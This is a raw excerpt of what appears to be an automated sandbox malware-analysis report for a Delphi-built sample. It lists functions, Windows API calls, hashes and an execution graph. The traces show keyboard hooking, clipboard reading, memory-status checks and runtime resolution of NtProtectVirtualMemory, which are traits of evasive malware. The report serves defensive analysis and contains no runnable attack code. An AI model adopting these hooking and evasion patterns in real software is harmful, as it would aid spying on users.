                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0298AAA3,?,?,00000000), ref: 0298AA54
                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 0298AA5F
                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0298AAA3,?,?,00000000), ref: 0298AA7D
                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 0298AA88
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4102113445-0
                                                                                                                            • Opcode ID: dc3a250ff9cfd210b402b63b85c0e5bebcfc85f69f21a871134b73d0fe8c25fd
                                                                                                                            • Instruction ID: 5dc25cea72c1eb461aaa585383bedbcbcd49fd54306eae14ac954ce51b2b1621
                                                                                                                            • Opcode Fuzzy Hash: dc3a250ff9cfd210b402b63b85c0e5bebcfc85f69f21a871134b73d0fe8c25fd
                                                                                                                            • Instruction Fuzzy Hash: F701D6756002487FF712FB74CD12F6E72AEDBC5720F5D0661F511AAAC0E674AE018AA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029A9D90 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 313threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0298352C: GetKeyboardType.USER32(00000000), ref: 02983531
                                                                                                                              • Part of subcall function 0298352C: GetKeyboardType.USER32(00000001), ref: 0298353D
                                                                                                                            • GetCommandLineA.KERNEL32 ref: 029AA06C
                                                                                                                            • GetACP.KERNEL32 ref: 029AA080
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 029AA08A
                                                                                                                              • Part of subcall function 0298355C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0298357E
                                                                                                                              • Part of subcall function 0298355C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029835CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835B1
                                                                                                                              • Part of subcall function 0298355C: RegCloseKey.ADVAPI32(?,029835D4,00000000,?,00000004,00000000,029835CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029835C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                                            • String ID: @8x
                                                                                                                            • API String ID: 3316616684-3331985703
                                                                                                                            • Opcode ID: 9020cc839696955c27792b6fd25cf78e1aa1e85dab61269064044d9ef3a0050b
                                                                                                                            • Instruction ID: 2301b00a41e93cce65363d759599d18c9d7c91941f0334aaa8754332c4b961e6
                                                                                                                            • Opcode Fuzzy Hash: 9020cc839696955c27792b6fd25cf78e1aa1e85dab61269064044d9ef3a0050b
                                                                                                                            • Instruction Fuzzy Hash: 2441CA6054E3C0DFD703ABB458B61A53FB19E4B20470E48C7C1C4DF1A3D629592BDB66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298AABC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0298AC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0298AAEB
                                                                                                                              • Part of subcall function 0298A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0298A79E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                                            • Opcode ID: f61f20f2c90608f6420787817a902f6d3b51a939999f82ec907041b0c686f628
                                                                                                                            • Instruction ID: a8aef7d42ba8bfb0396f64779db294b8e5d383b0f3812a6450d0d5fd861d387d
                                                                                                                            • Opcode Fuzzy Hash: f61f20f2c90608f6420787817a902f6d3b51a939999f82ec907041b0c686f628
                                                                                                                            • Instruction Fuzzy Hash: 4141D0307042068BC711FBB989906BEB3EBEFC5300F5C456BD682CB344E638DD029A61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029979FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02997A09
                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997A0F
                                                                                                                            Strings
                                                                                                                            • NtProtectVirtualMemory, xrefs: 029979FF
                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 02997A04
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                            • API String ID: 1646373207-1386159242
                                                                                                                            • Opcode ID: a92a4b6a754e7c8f576329dfb035a67ffa19cc7bd880cce9bc1e40e87aa5b615
                                                                                                                            • Instruction ID: e18165dc4d852460b99e74c83f263133415b4a7c8b11a608f2962ac9662cd6fb
                                                                                                                            • Opcode Fuzzy Hash: a92a4b6a754e7c8f576329dfb035a67ffa19cc7bd880cce9bc1e40e87aa5b615
                                                                                                                            • Instruction Fuzzy Hash: 9DE0B6B6644249AF9F40EEDCEC49D9B77ECAB58210B005401BA19DB201C630E9219FB0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298C430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,029AA10B,00000000,029AA11E), ref: 0298C436
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0298C447
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                            • Opcode ID: 6b2586d94c7fa4fe4abaf026c07a2ddbb0c97d73992a0875e72cbfd593a5a494
                                                                                                                            • Instruction ID: 7252cf8f42e9c52b465cccb4a335f681fd0faaa562f5df947f791a70378b47ea
                                                                                                                            • Opcode Fuzzy Hash: 6b2586d94c7fa4fe4abaf026c07a2ddbb0c97d73992a0875e72cbfd593a5a494
                                                                                                                            • Instruction Fuzzy Hash: 2AD0A770A843454EFB04BABD5494B3923DC8B94709F0C882AF0265D140D77184908FF0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298E1A4 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0298E253
                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0298E26F
                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0298E2E6
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0298E30F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 920484758-0
                                                                                                                            • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                            • Instruction ID: 7cb8c1bab498950ba30a9cb853d1d1ccc0680e9c148af2a1900940e3ce7845a8
                                                                                                                            • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                            • Instruction Fuzzy Hash: 9241F975A002199FCB62FB68C890BD9B3BDAF89314F0841E5F548E7251DB34AF808F61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298ACF8 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298AD15
                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD39
                                                                                                                            • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD54
                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADEA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3990497365-0
                                                                                                                            • Opcode ID: c24d9622cebe5f07288467227882df49958cc68a3f814ce946b390ea1128fbc1
                                                                                                                            • Instruction ID: c84996ce1ee7d7e78fe0793e27d31de4a77d6bd6b9fcbf77851d4fdd5c94b41b
                                                                                                                            • Opcode Fuzzy Hash: c24d9622cebe5f07288467227882df49958cc68a3f814ce946b390ea1128fbc1
                                                                                                                            • Instruction Fuzzy Hash: 4F41FA71A002589BDB21EB68CC84BDEB7FDAF48701F4844E6A548EB251EB759F848F50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0298ACF6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0298AD15
                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0298AD39
                                                                                                                            • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298AD54
                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0298ADEA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3990497365-0
                                                                                                                            • Opcode ID: bba60a97461b6a824b69038c9399fa204d4f0105e64c2acc1038d799dbebe756
                                                                                                                            • Instruction ID: 18d32ef98542ac811705d88557a9a7244fe4336d028e7e7a5b69ed9e13009f2a
                                                                                                                            • Opcode Fuzzy Hash: bba60a97461b6a824b69038c9399fa204d4f0105e64c2acc1038d799dbebe756
                                                                                                                            • Instruction Fuzzy Hash: 41411F71A0025C9BDB21EB68CC84BDAB7FDAF48701F4844E6A548EB251EB759F84CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02981C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 75a37c3d936d4cc9ea925468cace744a87d35da855c294c74fd00965e3be0dc7
                                                                                                                            • Instruction ID: 5ca2e26d35e60fe40e9b5cb9cb61035a34a25a8ca6229840574b5b0cd12fa790
                                                                                                                            • Opcode Fuzzy Hash: 75a37c3d936d4cc9ea925468cace744a87d35da855c294c74fd00965e3be0dc7
                                                                                                                            • Instruction Fuzzy Hash: 6DA1B0A77106014BD718BA7C9D843BDB3CADBC4225F2C867EE21DCB391EB68C9538650
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029894A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02989596), ref: 0298952E
                                                                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02989596), ref: 02989534
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                                            • String ID: yyyy
                                                                                                                            • API String ID: 3303714858-3145165042
                                                                                                                            • Opcode ID: 9bcb950bfdf450153fa18ef808eac29a47b1bb07a6eb53d769c0c30216686903
                                                                                                                            • Instruction ID: 95c150e57f500644e7d42599372e32b2d030ebc15fb6e9adf9b54de33689d056
                                                                                                                            • Opcode Fuzzy Hash: 9bcb950bfdf450153fa18ef808eac29a47b1bb07a6eb53d769c0c30216686903
                                                                                                                            • Instruction Fuzzy Hash: 2B213071A012189BEB15EF68D841AFEB3F9EF88710F5900A5ED05E7740E7309E40CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02999F9C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02999FD0
                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 0299A000
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000008), ref: 0299A01F
                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 0299A02B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Read$Write
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3448952669-0
                                                                                                                            • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                            • Instruction ID: 8769c20d94a9e8501af8c16b303290da4522c3efd6e0b84545f1176eb64f68f4
                                                                                                                            • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                            • Instruction Fuzzy Hash: 9B2196716402199BDF10DF6DCC80BAEB7ADFF8A365F048515EE149B340E734ED518AA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:64.6%
                                                                                                                            Signature Coverage:8.7%
                                                                                                                            Total number of Nodes:492
                                                                                                                            Total number of Limit Nodes:61
                                                                                                                            execution_graph 59339 41a365a0 59340 41a365e6 GetCurrentProcess 59339->59340 59342 41a36631 59340->59342 59343 41a36638 GetCurrentThread 59340->59343 59342->59343 59344 41a36675 GetCurrentProcess 59343->59344 59345 41a3666e 59343->59345 59346 41a366ab 59344->59346 59345->59344 59347 41a366d3 GetCurrentThreadId 59346->59347 59348 41a36704 59347->59348 59366 41a32bf0 59367 41a32c58 CreateWindowExW 59366->59367 59369 41a32d14 59367->59369 59369->59369 59370 41a308b0 59371 41a308bd 59370->59371 59374 41a30978 59371->59374 59376 41a304bc 59371->59376 59373 41a3093e 59381 41a304dc 59373->59381 59377 41a304c7 59376->59377 59385 41a31ab8 59377->59385 59391 41a31aaf 59377->59391 59378 41a30b67 59378->59373 59382 41a304e7 59381->59382 59384 41a37d9b 59382->59384 59426 41a37424 59382->59426 59384->59374 59386 41a31ae3 59385->59386 59397 41a3201d 59386->59397 59387 41a31b66 59388 41a314a0 GetModuleHandleW 59387->59388 59389 41a31b92 59387->59389 59388->59389 59392 41a31ab8 59391->59392 59396 41a3201d GetModuleHandleW 59392->59396 59393 41a31b66 59394 41a314a0 GetModuleHandleW 59393->59394 59395 41a31b92 59393->59395 59394->59395 59396->59393 59398 41a3204d 59397->59398 59399 41a320ce 59398->59399 59402 41a32190 59398->59402 59412 41a32189 59398->59412 59403 41a321a5 59402->59403 59405 41a321c9 59403->59405 59422 41a314a0 59403->59422 59406 41a314a0 GetModuleHandleW 59405->59406 59411 41a32385 59405->59411 59407 41a3230b 59406->59407 59408 41a314a0 GetModuleHandleW 59407->59408 59407->59411 59409 41a32359 59408->59409 59410 41a314a0 GetModuleHandleW 59409->59410 59409->59411 59410->59411 59411->59399 59413 41a32190 59412->59413 59414 41a314a0 GetModuleHandleW 59413->59414 59415 41a321c9 59413->59415 59414->59415 59416 41a314a0 GetModuleHandleW 59415->59416 59421 41a32385 59415->59421 59417 41a3230b 59416->59417 59418 41a314a0 GetModuleHandleW 59417->59418 59417->59421 59419 41a32359 59418->59419 59420 41a314a0 GetModuleHandleW 59419->59420 59419->59421 59420->59421 59421->59399 59423 41a324c0 GetModuleHandleW 59422->59423 59425 41a32535 59423->59425 59425->59405 59427 41a37db0 KiUserCallbackDispatcher 59426->59427 59429 41a37e1e 59427->59429 59429->59382 59657 41a3a080 59658 41a3a0c4 SetWindowsHookExA 59657->59658 59660 41a3a10a 59658->59660 59661 411b50b8 59662 411b50c2 59661->59662 59663 411b50e2 59662->59663 59666 4145e9e0 59662->59666 59670 4145e9f0 59662->59670 59667 4145e9ea 59666->59667 59668 4145ec50 59667->59668 59669 4145ec90 GlobalMemoryStatusEx 59667->59669 59668->59663 59669->59667 59672 4145ea05 59670->59672 59671 4145ec50 59671->59663 59672->59671 59673 4145ec90 GlobalMemoryStatusEx 59672->59673 59673->59672 59349 3d940890 59350 3d9408b1 59349->59350 59351 3d94097a 59350->59351 59353 3d9461a9 59350->59353 59356 3d949060 59353->59356 59358 3d949073 59356->59358 59360 3d949118 59358->59360 59361 3d949160 VirtualProtect 59360->59361 59363 3d9461c5 59361->59363 59674 3d89d030 59675 3d89d048 59674->59675 59676 3d89d0a2 59675->59676 59681 41a32d98 59675->59681 59685 41a32da8 59675->59685 59689 41a315d4 59675->59689 59702 41a377c0 59675->59702 59682 41a32da8 59681->59682 59683 41a315d4 5 API calls 59682->59683 59684 41a32def 59683->59684 59684->59676 59686 41a32dce 59685->59686 59687 41a315d4 5 API calls 59686->59687 59688 41a32def 59687->59688 59688->59676 59690 41a315df 59689->59690 59691 41a37851 59690->59691 59693 41a37841 59690->59693 59761 41a36574 59691->59761 59715 41d619a4 59693->59715 59721 41a37973 59693->59721 59728 41d61983 59693->59728 59736 41d618d8 59693->59736 59741 41a37978 59693->59741 59748 41a37968 59693->59748 59756 41d618d3 59693->59756 59694 41a3784f 59704 41a377c5 59702->59704 59703 41a37851 59705 41a36574 5 API calls 59703->59705 59704->59703 59706 41a37841 59704->59706 59707 41a3784f 59705->59707 59708 41a37973 5 API calls 59706->59708 59709 41d619a4 5 API calls 59706->59709 59710 41d61983 5 API calls 59706->59710 59711 41d618d3 5 API calls 59706->59711 59712 41a37968 5 API calls 59706->59712 59713 41a37978 5 API calls 59706->59713 59714 41d618d8 5 API calls 59706->59714 59708->59707 59709->59707 59710->59707 59711->59707 59712->59707 59713->59707 59714->59707 59716 41d619b2 59715->59716 59717 41d61962 59715->59717 59719 41d61983 5 API calls 59717->59719 59768 41d61990 59717->59768 59718 41d61978 59718->59694 59719->59718 59722 41a37978 59721->59722 59723 41a36574 5 API calls 59722->59723 59724 41a37a62 59722->59724 59791 41a37e50 59722->59791 59795 41a37e4b 59722->59795 59801 41a37e47 59722->59801 59723->59722 59724->59694 59729 41d6198e 59728->59729 59732 41d61910 59728->59732 59730 41d619a1 59729->59730 59733 41d62b3e 5 API calls 59729->59733 59730->59694 59731 41d61978 59731->59694 59734 41d61983 5 API calls 59732->59734 59735 41d61990 5 API calls 59732->59735 59733->59730 59734->59731 59735->59731 59738 41d618ec 59736->59738 59737 41d61978 59737->59694 59739 41d61983 5 API calls 59738->59739 59740 41d61990 5 API calls 59738->59740 59739->59737 59740->59737 59742 41a3797b 59741->59742 59743 41a36574 5 API calls 59742->59743 59744 41a37a62 59742->59744 59745 41a37e50 OleGetClipboard 59742->59745 59746 41a37e47 OleGetClipboard 59742->59746 59747 41a37e4b 2 API calls 59742->59747 59743->59742 59744->59694 59745->59742 59746->59742 59747->59742 59749 41a37972 59748->59749 59750 41a3797b 59748->59750 59749->59694 59751 41a36574 5 API calls 59750->59751 59752 41a37a62 59750->59752 59753 41a37e50 OleGetClipboard 59750->59753 59754 41a37e47 OleGetClipboard 59750->59754 59755 41a37e4b 2 API calls 59750->59755 59751->59750 59752->59694 59753->59750 59754->59750 59755->59750 59758 41d618ec 59756->59758 59757 41d61978 59757->59694 59759 41d61983 5 API calls 59758->59759 59760 41d61990 5 API calls 59758->59760 59759->59757 59760->59757 59762 41a3657f 59761->59762 59763 41a37b64 59762->59763 59764 41a37aba 59762->59764 59765 41a315d4 4 API calls 59763->59765 59766 41a37b12 CallWindowProcW 59764->59766 59767 41a37ac1 59764->59767 59765->59767 59766->59767 59767->59694 59769 41d619a1 59768->59769 59771 41d62b3e 59768->59771 59769->59718 59774 41a36574 5 API calls 59771->59774 59776 41a36547 59771->59776 59784 41a37a6b 59771->59784 59772 41d62b6a 59772->59769 59774->59772 59777 41a364eb 59776->59777 59778 41a3654b 59776->59778 59779 41a37b64 59778->59779 59780 41a37aba 59778->59780 59781 41a315d4 4 API calls 59779->59781 59782 41a37b12 CallWindowProcW 59780->59782 59783 41a37ac1 59780->59783 59781->59783 59782->59783 59783->59772 59785 41a37a78 59784->59785 59786 41a37b64 59785->59786 59787 41a37aba 59785->59787 59788 41a315d4 4 API calls 59786->59788 59789 41a37b12 CallWindowProcW 59787->59789 59790 41a37ac1 59787->59790 59788->59790 59789->59790 59790->59772 59792 41a37e6f 59791->59792 59793 41a37f2c 59792->59793 59806 41a3804b 59792->59806 59793->59722 59796 41a37e0d KiUserCallbackDispatcher 59795->59796 59798 41a37e4e 59795->59798 59797 41a37e1e 59796->59797 59797->59722 59799 41a37f2c 59798->59799 59800 41a3804b OleGetClipboard 59798->59800 59799->59722 59800->59798 59802 41a37e4a 59801->59802 59804 41a37e57 59801->59804 59802->59722 59803 41a37f2c 59803->59722 59804->59803 59805 41a3804b OleGetClipboard 59804->59805 59805->59804 59808 41a38058 59806->59808 59807 41a3806c 59807->59792 59808->59807 59812 41a3808b 59808->59812 59817 41a38098 59808->59817 59809 41a38081 59809->59792 59813 41a380aa 59812->59813 59815 41a38109 59813->59815 59822 41a3814b 59813->59822 59814 41a380cb 59814->59809 59815->59809 59818 41a380aa 59817->59818 59820 41a38109 59818->59820 59821 41a3814b OleGetClipboard 59818->59821 59819 41a380cb 59819->59809 59820->59809 59821->59819 59823 41a38170 59822->59823 59825 41a38189 59823->59825 59828 41a38360 59823->59828 59832 41a38350 59823->59832 59824 41a381a7 59824->59814 59825->59814 59830 41a38375 59828->59830 59831 41a3839b 59830->59831 59836 41a37770 59830->59836 59831->59824 59833 41a38375 59832->59833 59834 41a37770 OleGetClipboard 59833->59834 59835 41a3839b 59833->59835 59834->59833 59835->59824 59837 41a38408 OleGetClipboard 59836->59837 59839 41a384a2 59837->59839 59364 41a367e8 DuplicateHandle 59365 41a3687e 59364->59365 59840 3d949568 59842 3d94956e 59840->59842 59841 3d94963b 59842->59841 59845 41a3a643 59842->59845 59849 41a3a648 59842->59849 59846 41a3a657 59845->59846 59853 41a39bc0 59846->59853 59850 41a3a657 59849->59850 59851 41a39bc0 6 API calls 59850->59851 59852 41a3a677 59851->59852 59852->59842 59854 41a39bcb 59853->59854 59857 41a39c2c 59854->59857 59856 41a3ab45 59856->59856 59859 41a39c37 59857->59859 59858 41a3ad91 59860 41a3adec 59858->59860 59869 41d65158 59858->59869 59874 41d65168 59858->59874 59859->59858 59859->59860 59864 41a3c148 59859->59864 59860->59856 59865 41a3c169 59864->59865 59866 41a3c18d 59865->59866 59879 41a3c2bb 59865->59879 59883 41a3c2f8 59865->59883 59866->59858 59870 41d651cd 59869->59870 59871 41d64250 PeekMessageW 59870->59871 59872 